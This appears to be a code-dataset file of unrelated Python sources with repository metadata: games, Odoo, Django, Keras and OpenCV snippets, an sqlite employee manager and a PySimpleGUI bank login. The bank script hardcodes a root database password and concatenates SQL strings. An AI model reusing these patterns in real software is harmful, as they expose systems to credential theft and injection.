exit()\n\n#################################################\n\n if select.lower() == \"c\":\n playsound('select.wav')\n #display player stats\n showStats()\n\n#################################################\n\n if select.lower() == \"d\":\n playsound('select.wav')\n #create new player\n createPlayer()","repo_name":"teldrynsero/AdvPy-Cmarcial2","sub_path":"hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6863253386","text":"from odoo import fields,api,models,_\n\n\nclass PurchaseOder(models.Model):\n _inherit = 'purchase.order'\n\n received_status = fields.Boolean()\n note = fields.Text()\n @api.multi\n def check_purchase_order_received(self):\n for rec in self:\n state = False\n for order_id in rec.order_line:\n if order_id.received_state :\n state = True\n print(state,\"======\")\n rec.write({'received_status': state})\n print(rec.received_status,fields.Datetime.now())\n\n\n def update_note_with_discription(self):\n for rec in self:\n for line in rec.order_line:\n rec.note += line.name\n\n\nclass PurchaseOderLine(models.Model):\n _inherit = 'purchase.order.line'\n\n received_state = fields.Boolean(compute='update_parent_po',store=True)\n\n @api.depends('qty_received')\n def update_parent_po(self):\n for line in self:\n if line.qty_received:\n if line.product_qty > line.qty_received:\n line.received_state = False\n else:\n line.received_state = True\n parent_order= self.env['purchase.order'].search([('id','=',line.order_id.id)])\n print(\"parent ID \",parent_order)\n parent_order.check_purchase_order_received()","repo_name":"emadraafatgad/karim","sub_path":"third_party/manufacturing_furnature_mrp/models/stock_picking_backorder.py","file_name":"stock_picking_backorder.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26227944692","text":"from tkinter import *\nroot=Tk()\nroot.geometry(\"400x300\")\n\ndef something():\n a.config(text=\"how are you?\")\n root.config(bg=\"grey\")\n b.config(text=\"You have been configged\",state=DISABLED)\n\n# global a\na=Label(root,text=\"Hello everyone\")\na.pack(pady=10)\n\nb=Button(root,text=\"click me!\",command=something)\nb.pack()\nroot.mainloop()","repo_name":"praveenchandra01/Python","sub_path":"Python GUI/Config(8).py","file_name":"Config(8).py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29895385778","text":"import sqlite3\n\n\nclass ManageCompany:\n def __init__(self):\n self.db = sqlite3.connect(\"company.db\")\n self.db.row_factory = sqlite3.Row\n self.cursor = self.db.cursor()\n self.help_commands = {\n 'quit': 'Exit program',\n 'list_employees': 'List employees (name - possition)',\n 'monthly_spending': 'Company mounthly spendings',\n 'yearly_spending': 'Company yearly spendings',\n 'add_employee': 'Add employee',\n 'delete_employee ': 'Delete employee',\n 'update_employee ': 'Update employee'\n }\n self.available_commands = {\n 'quit': 0,\n 'list_employees': 0,\n 'monthly_spending': 0,\n 'yearly_spending': 0,\n 'add_employee': 0,\n 'delete_employee': 1,\n 'update_employee': 1,\n 'q': 0, 'le': 0, 'ms': 0, 'ys': 0, 'ae': 0, 'de': 1, 'ee': 1\n }\n self.start()\n\n def ask_for_command(self, prompt=\"command>\"):\n return input(prompt).lower()\n\n # Just a short cut\n def le(self):\n return self.list_employees()\n\n def list_employees(self):\n query = \"SELECT id, name, position FROM employees\"\n result = self.cursor.execute(query).fetchall()\n formated_result = []\n for employee in result:\n formated_result.append(' - '.join([str(x) for x in employee]))\n return formated_result\n\n def _get_monthly_spendings(self):\n query = \"SELECT SUM(monthly_salary) FROM employees\"\n return self.cursor.execute(query).fetchone()[0]\n\n # Just a short cut\n def ms(self):\n return self.monthly_spending()\n\n def monthly_spending(self):\n return \"The company is spending {} every month!\".format(\n self._get_monthly_spendings()\n )\n\n def _get_yearly_spending(self):\n query = \"SELECT SUM(yearly_bonus) FROM employees\"\n early_bonuses = self.cursor.execute(query).fetchone()[0]\n return self._get_monthly_spendings() * 12 + early_bonuses\n\n def _is_sure(self, question):\n question += ' [y/N]'\n answer = self.ask_for_command(question)\n if answer == '' or answer == 'n':\n return False\n elif answer == 'y':\n return True\n else:\n self._is_sure(question)\n\n # Just a short cut\n def ys(self):\n return self.yearly_spending()\n\n def yearly_spending(self):\n return \"The company is spending {} every year!\".format(\n self._get_yearly_spending()\n )\n\n # Just a short cut\n def ae(self):\n return self.add_employee()\n\n def add_employee(self):\n name = self.ask_for_command('name>')\n while len(name) < 5:\n print(\"Name must be longer than 5 characters\")\n name = self.ask_for_command('name>')\n salary = int(self.ask_for_command('monthly_salary>'))\n while salary <= 0:\n print(\"We don't allow slavery in our company(sallary must be > 0)\")\n salary = int(self.ask_for_command('monthly_salary>'))\n bonus = int(self.ask_for_command('yearly_bonus>'))\n while bonus < 0:\n print(\"You can't steal from our employees (yearly_bonus >= 0)\")\n bonus = int(self.ask_for_command('yearly_bonus>'))\n position = self.ask_for_command('position>')\n while len(position) < 2:\n print(\"Position must be longer than 2 characters\")\n position = self.ask_for_command('position>')\n query = \"INSERT INTO employees VALUES(?,?,?,?,?)\"\n self.cursor.execute(query, (None, name, salary, bonus, position))\n return \"Employee added\"\n\n # Just a short cut\n def de(self, employee_id):\n return self.delete_employee(employee_id)\n\n def delete_employee(self, employee_id):\n select_query = \"SELECT name FROM employees WHERE id = ?\"\n try:\n name = self.cursor.execute(select_query, employee_id).fetchone()[0]\n except Exception:\n return \"No such employee id\"\n delete_query = \"DELETE FROM employees WHERE id = ?\"\n question = \"Are you sure you want to delete {}\".format(name)\n if self._is_sure(question):\n self.cursor.execute(delete_query)\n return name + \" was deleted\"\n\n # Just a short cut\n def ee(self, employee_id):\n return self.edit_employee(employee_id)\n\n def edit_employee(self, employee_id):\n select_query = \"\"\"SELECT name, monthly_salary, yearly_bonus, position\n FROM employees WHERE id = ?\"\"\"\n try:\n employee = self.cursor.execute(select_query, employee_id).fetchone()\n except Exception:\n return \"No such employee id\"\n update_query = \"UPDATE employees SET {}, WHERE id=?\"\n changed = []\n query_updates = {\n 'name': 'name = ?',\n 'sallary': 'monthly_salary = ?',\n 'bonus': 'yearly_bonus = ?',\n 'position': 'position = ?'\n }\n prompt = 'name[{}]>'.format(employee['name'])\n name = self.ask_for_command(prompt)\n while len(name) < 5:\n if name == '':\n name = employee['name']\n break\n else:\n changed.append('name')\n print(\"Name must be longer than 5 characters\")\n name = self.ask_for_command(prompt)\n prompt = 'monthly_salary[{}]>'.format(employee['monthly_salary'])\n salary = self.ask_for_command(prompt)\n if salary == '':\n salary = employee['monthly_salary']\n else:\n salary = int(salary)\n while salary <= 0:\n if salary == '':\n salary = employee['monthly_salary']\n break\n else:\n changed.append('salary')\n print(\"We don't allow slavery in our company(sallary must be > 0)\")\n salary = int(self.ask_for_command(prompt))\n prompt = 'yearly_bonus[{}]>'.format(employee['yearly_bonus'])\n bonus = self.ask_for_command(prompt)\n if bonus == '':\n bonus = employee['yearly_bonus']\n else:\n bonus = int(bonus)\n changed.append('bonus')\n while bonus < 0:\n if bonus == '':\n bonus = employee['yearly_bonus']\n break\n else:\n changed.append('bonus')\n print(\"You can't steal from our employees (yearly_bonus >= 0)\")\n bonus = int(self.ask_for_command(prompt))\n prompt = 'position[{}]>'.format(employee['position'])\n position = self.ask_for_command(prompt)\n while len(position) < 2:\n if position == '':\n position = employee['position']\n break\n else:\n changed.append('position')\n print(\"Position must be longer than 2 characters\")\n position = self.ask_for_command(prompt)\n print(changed)\n if len(changed) > 0:\n update_query.format(', '.join([query_updates[x] for x in changed]))\n return update_query\n else:\n return None\n\n def execute(self, command_with_arg):\n command, arg = command_with_arg\n if arg is not None and self.available_commands[command] != 0:\n result = getattr(self, command)(arg)\n else:\n result = getattr(self, command)()\n if result is None:\n return None\n if type(result) is list or type(result) is tuple:\n for row in result:\n print(row)\n else:\n print(result)\n\n def start(self):\n while True:\n command_with_arg = self.ask_for_command()\n if ' ' in command_with_arg:\n command = command_with_arg.split(' ', 1)\n else:\n command = [command_with_arg, None]\n if command[0] not in self.available_commands:\n print(\"Ivalid command use help or ? for available commands\")\n elif command[0] == \"quit\" or command[0] == \"q\":\n break\n else:\n # self.execute(command)\n try:\n self.execute(command)\n except TypeError:\n print(\"Missing second argument for {}\".format(command[0]))\n self.db.commit()\n self.db.close()\n\n\nif __name__ == '__main__':\n mc = ManageCompany()\n","repo_name":"nikpet/hb","sub_path":"week7/2/manage_company.py","file_name":"manage_company.py","file_ext":"py","file_size_in_byte":8458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2671402182","text":"from .player import Player, Dealer\nfrom .inputs import ask_for_another_round\n\nfrom itertools import count\nimport sys\nimport os\n\n\nclass Blackjack():\n\tdef __init__(\n\t\t\tself,\n\t\t\tbankroll,\n\t\t\tbet_unit,\n\t\t\tbet_spread,\n\t\t\tbank_adjustment_resolution,\n\t\t\tpenetration_percentage,\n\t\t\tnumber_of_decks,\n\t\t\tuse_basic_strategy,\n\t\t\tstand_on_soft_17=True,\n\t\t\tcan_double=True,\n\t\t\tcan_double_after_split=True,\n\t\t\tcan_surrender=True,\n\t\t\tnum_players=1\n\t\t\t):\n\t\tself.players = []\n\t\tself.y_axis_average = []\n\t\tfor x in range(num_players):\n\t\t\tself.players.append(\n\t\t\t\tPlayer(\n\t\t\t\t\tbankroll=bankroll,\n\t\t\t\t\tbet_unit=bet_unit,\n\t\t\t\t\tbet_spread=bet_spread,\n\t\t\t\t\tbank_adjustment_resolution=bank_adjustment_resolution,\n\t\t\t\t\tuse_basic_strategy=use_basic_strategy,\n\t\t\t\t\tstand_on_soft_17=stand_on_soft_17,\n\t\t\t\t\tcan_double=True,\n\t\t\t\t\tcan_double_after_split=True,\n\t\t\t\t\tcan_surrender=True,\n\t\t\t\t\tname=x+1\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\tif x == 0 and use_basic_strategy is False:\n\t\t\t\tuse_basic_strategy = True\n\n\t\tself.dealer = Dealer(\n\t\t\tstand_on_soft_17=stand_on_soft_17,\n\t\t\tpenetration_percentage=penetration_percentage,\n\t\t\tnumber_of_decks=number_of_decks,\n\t\t\t)\n\n\n\tdef bets(self):\n\t\tfor player in self.players:\n\t\t\tif not player.bankrupt:\n\t\t\t\tplayer.make_a_bet()\n\n\n\tdef initial_deal(self):\n\t\tdealer_upcard = self.dealer.hit()\n\t\tfor player in self.players:\n\t\t\tif not player.bankrupt:\n\t\t\t\tplayer.dealer_upcard = dealer_upcard\n\t\t\t\tplayer.hit()\n\n\n\tdef log_hands(self):\n\t\tself.dealer.log_hand()\n\t\tfor person in self.players:\n\t\t\tperson.log_hand()\n\n\n\tdef make_moves(self):\n\t\tfor player in self.non_bankrupt_players():\n\t\t\tplayer.move()\n\t\tif (not self.all_players_bust() and not self.all_players_surrender()) or self.valid_splits_present():\n\t\t\tself.dealer.move()\n\t\telse:\n\t\t\tself.dealer.reveal_card()\n\n\n\tdef non_bankrupt_players(self):\n\t\treturn list(filter(lambda player: player.bankrupt is False, self.players))\n\n\n\tdef all_players_bust(self):\n\t\tbusts = [player.busts for player in self.players]\n\t\treturn all(busts)\n\n\n\tdef all_players_surrender(self):\n\t\tsurrenders = [player.surrendered for player in self.players]\n\t\treturn all(surrenders)\n\n\tdef valid_splits_present(self):\n\t\tvalids = []\n\t\tfor player in self.players:\n\t\t\tvalids.append(player.valid_splits())\n\t\treturn any(valids)\n\n\n\tdef get_no_bust_unsurrendered_players(self):\n\t\treturn filter(\n\t\t\tlambda player: (player.busts is False and player.surrendered is False) or player.valid_splits(),\n\t\t\tself.non_bankrupt_players()\n\t\t\t)\n\n\n\tdef next_round_check(self):\n\t\tif not self.players_broke() and (self.players[0].use_basic_strategy or self.manual_round_check()):\n\t\t\tself.new_round()\n\t\t\treturn True\n\n\n\tdef players_broke(self):\n\t\tbroke = [player.bankroll < 1 for player in self.players]\n\t\treturn all(broke)\n\n\n\tdef manual_round_check(self):\n\t\tanswer = ask_for_another_round()\n\t\tif answer.startswith('y') or answer == '':\n\t\t\treturn True\n\t\telse:\n\t\t\tprint('Bye.')\n\n\n\tdef new_round(self):\n\t\tprint('New round')\n\t\tself.dealer.new_hand()\n\t\tfor player in self.players:\n\t\t\tplayer.new_hand(hard=True)\n\n\n\tdef average(self):\n\t\taverage = round(sum([ player.bankroll for player in self.players]) / len(self.players))\n\t\tself.y_axis_average.append(average)\n\n\n\tdef update_axes(self):\n\t\tfor player in self.players:\n\t\t\tplayer.update_y_axis()\n\n\n\tdef game(self):\n\t\tif self.non_bankrupt_players():\n\t\t\tself.bets()\n\t\t\tself.initial_deal()\n\t\t\tself.log_hands()\n\t\t\tself.make_moves()\n\t\t\tself.dealer.compare_players(self.get_no_bust_unsurrendered_players())\n\t\t\tself.next_round_check()\n\t\t\t# print(self.dealer.shoe.shoe)\n\t\tself.update_axes()\n\n\ndef main(\n\tbankroll,\n\tbet_unit,\n\tbet_spread,\n\tbank_adjustment_resolution,\n\tuse_basic_strategy,\n\tpenetration_percentage,\n\tnumber_of_decks,\n\tstand_on_soft_17,\n\tcan_double,\n\tcan_double_after_split,\n\tcan_surrender,\n\tnum_players,\n\tgame_interval,\n\tspeed_ms,\n\tanimate=False,\n\tdebug=False\n\t):\n\n\tbkjk = Blackjack(\n\t\tbankroll=bankroll,\n\t\tbet_unit=bet_unit,\n\t\tbet_spread=bet_spread,\n\t\tbank_adjustment_resolution=bank_adjustment_resolution,\n\t\tuse_basic_strategy=use_basic_strategy,\n\t\tnum_players=num_players,\n\t\tpenetration_percentage=penetration_percentage,\n\t\tnumber_of_decks=number_of_decks\n\t\t)\n\tplyr = bkjk.players[0]\n\n\tif not debug:\n\t\tblockPrint()\n\n\tx_axis = []\n\tx = count()\n\tx_axis.append(next(x))\n\tbkjk.average()\n\tcolors = ['#0099ee', '#dd0022']\n\n\tdef progress_rounds():\n\t\tfor y in range(game_interval):\n\t\t\tx_axis.append(next(x))\n\t\t\tbkjk.game()\n\t\t\tbkjk.average()\n\n\twhile len(x_axis) < 2000:\n\t\tprogress_rounds()\n\n\treturn [p.y_axis for p in bkjk.players]\n\n\ndef blockPrint():\n\tsys.stdout = open(os.devnull, 'w')\n\n\nif __name__ == '__main__':\n\tmain(\n\t\tbankroll=1000,\n\t\tbet_unit=20,\n\t\tbank_adjustment_resolution=20,\n\t\tbet_spread=12,\n\t\tuse_basic_strategy=True,\n\t\tpenetration_percentage=70,\n\t\tnumber_of_decks=8,\n\t\tstand_on_soft_17=True,\n\t\tcan_double=True,\n\t\tcan_double_after_split=True,\n\t\tcan_surrender=True,\n\t\tnum_players=6,\n\t\tgame_interval=50,\n\t\tspeed_ms=250,\n\t\tdebug=True,\n\t\tanimate=True\n\t\t)\n\n","repo_name":"ZFudge/blackjack_sim","sub_path":"blackjack/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"4922760082","text":"import numpy as np\nimport pandas as pd\nimport os\nimport json\nfrom sklearn.preprocessing import MultiLabelBinarizer\nimport keras\nfrom keras.layers import Conv1D, MaxPool1D, LSTM, Dropout, Dense\nfrom keras.models import Sequential\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom sklearn.base import BaseEstimator\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.externals import joblib\nfrom uuid import uuid4\n\n\nclass MorphVectorizer(BaseEstimator):\n def __init__(self, sep=\"|\"):\n self.morph_enc = MultiLabelBinarizer()\n self.sep = sep\n\n def fit(self, X, y=None):\n l_x_tags = []\n for doc in X:\n for sent in doc[\"sentences\"]:\n for word in sent:\n word_morph = [word[\"pos\"]] + word[\"grm\"].split(self.sep)\n l_x_tags.append(word_morph)\n self.morph_enc.fit(l_x_tags)\n\n def transform(self, X, y=None):\n l_docs = []\n for doc in X:\n l_doc = []\n for sent in doc[\"sentences\"]:\n for word in sent:\n word_morph = [word[\"pos\"]] + word[\"grm\"].split(self.sep)\n l_doc.append(word_morph)\n arr_doc = self.morph_enc.transform(l_doc)\n l_docs.append(arr_doc)\n\n max_doc_len = max([doc.shape[0] for doc in l_docs])\n word_dim = len(self.morph_enc.classes_)\n for doc_ind, doc in enumerate(l_docs):\n doc_padded = np.zeros((max_doc_len, word_dim))\n doc_padded[:len(doc)] = doc\n l_docs[doc_ind] = np.array(doc_padded, copy=True)\n\n l_docs = np.array(l_docs)\n return l_docs\n\n def fit_transofrm(self, X, y=None):\n self.fit(X, y)\n return self.transform(X, y)\n\n\nclass NNModelSimple(BaseEstimator):\n def __init__(self, model_path, batch_size=32):\n self.y_label_enc = MultiLabelBinarizer()\n self.morph_enc = MorphVectorizer()\n self.model = Sequential()\n self.model_path = model_path\n self.batch_size = batch_size\n self.h = keras.callbacks.History\n\n def fit(self, X, y):\n # Для разделения на тренировочное и валидационное множества по ID пользователя\n user_ids = []\n for doc in X:\n doc_user_id = doc[\"meta\"].get(\"user_id\", str(uuid4()))\n if \"user_id\" not in doc[\"meta\"]:\n doc[\"meta\"][\"user_id\"] = doc_user_id\n user_ids.append(doc_user_id)\n\n tr_user_ids, vl_user_ids = train_test_split(np.unique(user_ids), train_size=0.9, test_size=0.1)\n\n y = np.array([str(val) for val in y])\n self.y_label_enc.fit(y)\n self.morph_enc.fit(X)\n X = np.array(X)\n\n X_tr = np.array([doc for doc, user_id in zip(X, user_ids) if user_id in tr_user_ids])\n X_vl = np.array([doc for doc, user_id in zip(X, user_ids) if user_id in vl_user_ids])\n y_tr = np.array([doc for doc, user_id in zip(y, user_ids) if user_id in tr_user_ids])\n y_vl = np.array([doc for doc, user_id in zip(y, user_ids) if user_id in vl_user_ids])\n y_tr_enc = self.y_label_enc.transform(y_tr)\n y_vl_enc = self.y_label_enc.transform(y_vl)\n\n self.model = self.keras_model(len(self.y_label_enc.classes_), len(self.morph_enc.morph_enc.classes_))\n save_model = ModelCheckpoint(os.path.join(self.model_path, \"model.hdf5\"), save_best_only=True)\n early_stop = EarlyStopping(patience=30)\n self.h = self.model.fit_generator(self.batch_gen(X_tr, y_tr_enc), self.get_n_steps(len(X_tr), self.batch_size),\n validation_data=self.batch_gen(X_vl, y_vl_enc),\n validation_steps=self.get_n_steps(len(X_vl), self.batch_size),\n verbose=1, epochs=300, callbacks=[save_model, early_stop]).history\n return self\n\n def save_model(self, model_path):\n joblib.dump(self.y_label_enc, os.path.join(model_path, \"y_label_enc.pkl\"))\n joblib.dump(self.morph_enc, os.path.join(model_path, \"morph_enc.pkl\"))\n d_model_params = {}\n for k, v in self.__dict__.items():\n if k not in [\"y_label_enc\", \"morph_enc\", \"model\"]:\n d_model_params[k] = v\n with open(os.path.join(model_path, \"model_params.json\"), \"w\") as f:\n return json.dump(d_model_params, f)\n\n def load_model(self, model_path):\n with open(os.path.join(model_path, \"model_params.json\"), \"r\") as f:\n d_model_params = json.load(f)\n for k, v in d_model_params.items():\n self.k = v\n self.y_label_enc = joblib.load(os.path.join(model_path, \"y_label_enc.pkl\"))\n self.morph_enc = joblib.load(os.path.join(model_path, \"morph_enc.pkl\"))\n self.model = keras.models.load_model(os.path.join(model_path, \"model.hdf5\"))\n return self\n\n def predict(self, X, y=None):\n X = np.array(X)\n pred = self.model.predict_generator(self.batch_gen(X, None),\n steps=self.get_n_steps(len(X), self.batch_size),\n verbose=1)\n res = np.zeros(pred.shape)\n val_ind = 0\n for val in pred:\n res[val_ind, np.argmax(val)] = 1.\n val_ind += 1\n res = self.y_label_enc.inverse_transform(res)\n res = np.array([val[0] for val in res])\n return res\n\n def batch_gen(self, X, y=None, batch_size=32, shuffle=False):\n inds = np.arange(0, len(X))\n while True:\n if shuffle:\n np.random.shuffle(inds)\n\n for start_ind in np.arange(0, len(inds), batch_size):\n batch_inds = inds[start_ind:start_ind + batch_size]\n x_batch = X[batch_inds]\n x_batch_enc = self.morph_enc.transform(x_batch)\n if y is not None:\n y_batch = y[batch_inds]\n yield x_batch_enc, y_batch\n else:\n yield x_batch_enc\n\n @staticmethod\n def get_n_steps(seq_len, batch_size=32):\n res = int(seq_len/batch_size)\n if seq_len % batch_size != 0:\n res += 1\n return res\n\n @staticmethod\n def keras_model(out_dim, tags_dim):\n model_hidden = Sequential()\n model_hidden.add(Conv1D(128, 2, activation=\"relu\", padding=\"same\", input_shape=[None, tags_dim]))\n model_hidden.add(MaxPool1D(2, padding=\"same\"))\n model_hidden.add(Conv1D(128, 2, activation=\"relu\", padding=\"same\"))\n model_hidden.add(MaxPool1D(2, padding=\"same\"))\n model_hidden.add(Conv1D(128, 2, activation=\"relu\", padding=\"same\"))\n model_hidden.add(MaxPool1D(2, padding=\"same\"))\n model_hidden.add(LSTM(128))\n\n model = Sequential()\n model.add(model_hidden)\n model.add(Dropout(0.5))\n model.add(Dense(out_dim, activation=\"softmax\"))\n\n model.compile(\"adam\", \"mse\", metrics=[\"accuracy\"])\n\n return model","repo_name":"sag111/author_gender_and_age_profiling_with_style_imitation_detection","sub_path":"NNModel_simple.py","file_name":"NNModel_simple.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"21873684881","text":"from django.shortcuts import render\r\nfrom appOne import forms\r\n# Create your views here.\r\ndef StudentFormView(request):\r\n form = forms.StudentForm()\r\n if request.method == 'POST':\r\n data = forms.StudentForm(request.POST)\r\n if data.is_valid():\r\n print('form is valid')\r\n print('StudentName',data.cleaned_data['StudentName'])\r\n print('mail',data.cleaned_data['StudentEmail'])\r\n print('location',data.cleaned_data['StudentLocation'])\r\n print('Mobilenumber',data.cleaned_data['StudentMobile'])\r\n return render(request, 'template/form.html',{'form':form})\r\n","repo_name":"Mani015/python-11am-batch","sub_path":"DJANGO-RTP/project7-forms/appOne/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"39"} +{"seq_id":"30838351986","text":"import cv2\nimport random\nimport numpy as np\n\nimage = cv2.imread(\"../resource/coffee.jpg\")\n(rows, cols, planes) = np.shape( image )\ncenter = (cols // 2, rows // 2)\n\nmatrix = cv2.getRotationMatrix2D(center, 45, 1)\nrotation = cv2.warpAffine(image, matrix, (cols, rows))\n\ncv2.imshow( \"Original\", image )\ncv2.imshow( \"Rotation\", rotation )\n\ncv2.waitKey(0)","repo_name":"filipeoliveirabr/hands-on-cv","sub_path":"03 - Pixel Manipulation & Geometry/image_transformations_rotation.py","file_name":"image_transformations_rotation.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73430781235","text":"def customer():\n import PySimpleGUI as sg\n import mysql.connector as sql\n import matplotlib.pyplot as plt\n\n conn = sql.connect(host='localhost', user='root', passwd='123456', database='BANK_DBMS')\n cur = conn.cursor()\n\n query = \"SELECT Name,acc_no,login_pin FROM customer_login\"\n cur.execute(query)\n results = cur.fetchall()\n\n sg.theme('DarkAmber') # Add a touch of color\n # All the stuff inside your window.\n layout = [[sg.Image('Untitledlogo.png',expand_x=True, expand_y=True )],\n [sg.Text('Account Holder Name',key = 'ACC'), sg.InputText()],\n [sg.Text('Account Number'), sg.InputText()],\n [sg.Text('Pin'), sg.InputText()],\n [sg.Button('Login'), sg.Button('Cancel'),sg.Button('Details'),sg.Button('Analysis')]]\n\n # Create the Window\n window = sg.Window('Customer GUI', layout,keep_on_top=True)\n # Event Loop to process \"events\" and get the \"values\" of the inputs\n while True:\n event, values = window.read()\n values = tuple(values.values())\n values = (values[0], int(values[1]), int(values[2]))\n print(values, results)\n if event == sg.WIN_CLOSED or event == 'Cancel': # if user closes window or clicks cancel\n break\n if (values[0], values[1], values[2]) in results:\n print(\"Authentication successful\")\n if event == 'Details':\n account_number = values[1]\n q2 = \"SELECT money FROM customer_login where acc_no =\" + str(account_number)\n cur.execute(q2)\n r2 = cur.fetchall()\n sg.popup_scrolled(\"Account Holder Name --->\"+str(values[0]),\"\\nAccount Number --->\"+str(values[1]),\"\\nCurrent Account Balance--->\"+str(r2),size=(300, 10))\n else:\n sg.popup_auto_close(\"Welcome\")\n if event == 'Analysis':\n # x axis values\n x = [1, 2, 3]\n # corresponding y axis values\n y = [2, 4, 1]\n\n # plotting the points\n plt.plot(x, y)\n\n # naming the x axis\n plt.xlabel('x - axis')\n # naming the y axis\n plt.ylabel('y - axis')\n\n # giving a title to my graph\n plt.title('This Analysis Feature is under development')\n\n # function to show the plot\n plt.show()\n sg.popup_auto_close('This Graph is only for example')\n else:\n print(\"Authentication failed\")\n event = sg.WIN_CLOSED\n break\n\n window.close()\n","repo_name":"naman520/bank_dbms","sub_path":"Main/main files/final_account.py","file_name":"final_account.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27505420308","text":"#!/usr/bin/python3\n\nimport json\nimport falcon\n\nfrom lib.const import Version, Message\nfrom lib.utility import SystemUtility, DocumentUtility, CustomJSONEncoder\nfrom lib.resource import BaseJsonApiResource\n\n\nclass OsLogApiResource(BaseJsonApiResource):\n def on_get(self, req, resp, hostname, resource, from_date, to_date):\n resp.status = falcon.HTTP_200\n body = SystemUtility.get_response_base_with_body(Version.VERSION_1)\n doc_db = DocumentUtility.get_document()\n if resource == 'cpu':\n data = doc_db.searchCpuLog(hostname, from_date, to_date)\n body['data']['data'] = list(map(lambda x: {'timestamp': x['timestamp'], 'ratio': x['cpu']['ratio'], 'user': x['cpu']['user'], 'sys': x['cpu']['sys'], 'idle': x['cpu']['idle'], 'wait': x['cpu']['wait'], 'steal': x['cpu']['steal']}, data))\n body['data']['key'] = ['user', 'sys', 'idle', 'wait', 'steal']\n self.logger.debug(str(data))\n elif resource == 'memory':\n data = doc_db.searchMemoryLog(hostname, from_date, to_date)\n body['data']['data'] = list(map(lambda x: {'timestamp': x['timestamp'], 'ratio': x['memory']['ratio'], 'free': x['memory']['free'], 'buff': x['memory']['buff'], 'cache': x['memory']['cache']}, data))\n body['data']['key'] = ['free', 'buff', 'cache']\n self.logger.debug(str(data))\n elif resource == 'swap':\n data = doc_db.searchSwapLog(hostname, from_date, to_date)\n body['data']['data'] = list(map(lambda x: {'timestamp': x['timestamp'], 'swapped': x['memory']['swapped']}, data))\n body['data']['key'] = ['swapped']\n self.logger.debug(str(data))\n elif resource == 'storage':\n data = doc_db.searchStorageLog(hostname, from_date, to_date)\n index = {}\n key = {}\n for i in data:\n try:\n index[i['timestamp']][i['storage']['mounted_path']] = i['storage']['ratio']\n except KeyError:\n index[i['timestamp']] = {i['storage']['mounted_path']: i['storage']['ratio']}\n key[i['storage']['mounted_path']] = True\n body['data']['data'] = list(map(lambda x: {'timestamp': x[0], **x[1]}, index.items()))\n body['data']['key'] = list(key.keys())\n self.logger.debug(str(data))\n elif resource == 'diskio':\n data = doc_db.searchIoLog(hostname, from_date, to_date)\n body['data']['data'] = list(map(lambda x: {'timestamp': x['timestamp'], 'block_in': x['io']['block_in'], 'block_out': x['io']['block_out']}, data))\n body['data']['key'] = ['block_in', 'block_out']\n self.logger.debug(str(data))\n elif resource == 'network':\n pass\n else:\n resp.status = falcon.HTTP_400\n SystemUtility.set_response_metadata(Version.VERSION_1, body, Message.RESPONSE_NG, Message.RESPONSE_REQUEST_URL_ERROR)\n\n resp.body = json.dumps(body, cls=CustomJSONEncoder)\n","repo_name":"kuro2a/kiku","sub_path":"lib/resource/api/OsLogApiResource.py","file_name":"OsLogApiResource.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"12062813725","text":"# Initial state of boxes\nboxes = {\n 0: ['desert', 'book', 'toothbrush', 'sculpture'],\n 1: ['microwave', 'flower', 'boat', 'magnet'],\n 2: ['seaweed', 'submarine'],\n 3: ['card'],\n 4: [],\n 5: ['butterfly', 'console', 'telescope'],\n 6: ['wig', 'helmet', 'fish'],\n 7: ['elephant', 'sandals', 'beach', 'necklace'],\n 8: ['mixer'],\n 9: ['ocean', 'lipstick', 'zipper', 'usb', 'soap'],\n 10: ['button', 'scissors', 'river', 'puzzle', 'oven']\n}\n\n# Replace the sandals and the elephant with the puzzle and the pants in Box 7.\nboxes[7].remove('sandals')\nboxes[7].remove('elephant')\nboxes[7].append('puzzle')\nboxes[7].append('pants')\n\n# Remove the puzzle and the beach and the pants from Box 7.\nitems_to_remove = ['puzzle', 'beach', 'pants']\nfor item in items_to_remove:\n boxes[7].remove(item)\n\n# Swap the fish in Box 6 with the soap in Box 9.\nboxes[6].remove('fish')\nboxes[9].remove('soap')\nboxes[6].append('soap')\nboxes[9].append('fish')\n\n# Replace the sculpture and the desert with the hat and the shirt in Box 0.\nboxes[0].remove('sculpture')\nboxes[0].remove('desert')\nboxes[0].append('hat')\nboxes[0].append('shirt')\n\n# Move the card from Box 3 to Box 1.\nboxes[3].remove('card')\nboxes[1].append('card')\n\n# Put the flower into Box 5.\nboxes[5].append('flower')\n\n# Remove the hat and the shirt and the book from Box 0.\nitems_to_remove = ['hat', 'shirt', 'book']\nfor item in items_to_remove:\n boxes[0].remove(item)\n\n# Replace the toothbrush with the plane in Box 0.\nboxes[0].remove('toothbrush')\nboxes[0].append('plane')\n\n# Swap the plane in Box 0 with the card in Box 1.\nboxes[0].remove('plane')\nboxes[1].remove('card')\nboxes[0].append('card')\nboxes[1].append('plane')\n\n# Move the submarine and the seaweed from Box 2 to Box 7.\nitems_to_move = ['submarine', 'seaweed']\nfor item in items_to_move:\n boxes[2].remove(item)\n boxes[7].append(item)\n\n# Move the card from Box 0 to Box 9.\nboxes[0].remove('card')\nboxes[9].append('card')\n\n# Remove 